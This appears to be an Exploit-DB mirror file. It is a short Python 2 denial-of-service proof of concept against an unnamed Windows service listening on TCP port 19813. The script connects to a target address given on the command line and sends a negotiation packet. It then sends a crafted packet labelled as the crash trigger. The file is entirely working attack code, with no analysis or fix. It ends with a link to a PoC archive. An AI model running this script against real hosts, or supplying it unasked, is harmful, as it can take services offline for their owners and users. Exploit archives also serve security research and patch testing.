exploit-db-mirror/exploits/windows_x86/dos/15214.py
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

46 lines
No EOL
1,023 B
Python
Executable file

#!/usr/bin/python
import socket,struct,sys,os
SIGN=0x04030201
cmd=0x01000000
def main():
if len(sys.argv)!=2:
print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n"
sys.exit(0)
else:
host=sys.argv[1],19813 #default port TCP/19813
if sys.platform=="win32":
os.system("cls")
else:
os.system("clear")
s=socket.socket()
try:
s.connect(host)
s.recv(1024)
except:
print"[x] Error connecting to remote host! This is g00d :D."
sys.exit(0)
print"[+] Building crafted packets..."
#packet negotiation request
pktnego=struct.pack(">L",cmd+0x1) #+0
pktnego+=struct.pack("<L",0x00000000) #+4
pktnego+=struct.pack("<L",SIGN) #+8 (signature)
#packet crash
pkt1=struct.pack("<L",cmd+0x2)
pkt1+=struct.pack(">L",0x00000001) # != 0x0
pkt1+=struct.pack("<L",SIGN)
#end
print"[+] Negotiation."
s.send(pktnego)
s.recv(1024)
s.send(pkt1)#crash!
s.close()
if __name__=="__main__":
main()
#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip